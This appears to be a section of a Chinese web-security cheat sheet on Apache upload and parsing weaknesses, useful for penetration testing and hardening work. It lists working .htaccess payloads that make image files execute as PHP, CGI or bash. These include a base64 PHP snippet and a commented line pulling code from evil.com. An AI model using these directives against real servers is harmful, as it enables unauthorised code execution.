4.15.2. Apache

4.15.2.1. 后缀解析

test.php.x1.x2.x3 ( x1,x2,x3 为没有在 mime.types 文件中定义的文件类型)。Apache 将从右往左开始判断后缀, 若x3为非可识别后缀,则判断x2,直到找到可识别后缀为止,然后对可识别后缀进行解析

4.15.2.2. .htaccess

当AllowOverride被启用时,上传启用解析规则的.htaccess

  1. AddType application/x-httpd-php .jpg
  1. php_value auto_append_file .htaccess
  2. #<?php phpinfo();
  1. Options ExecCGI
  2. AddHandler cgi-script .jpg
  1. Options +ExecCGI
  2. AddHandler fcgid-script .gif
  3. FcgidWrapper "/bin/bash" .gif
  1. php_flag allow_url_include 1
  2. php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
  3. #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
  4. #php_value auto_append_file https://evil.com/evil-code.txt

4.15.2.3. 目录遍历

配置 Options +Indexes 时Apache存在目录遍历漏洞。

4.15.2.4. CVE-2017-15715

%0A绕过上传黑名单

4.15.2.5. lighttpd

xx.jpg/xx.php

4.15.2.6. 参考链接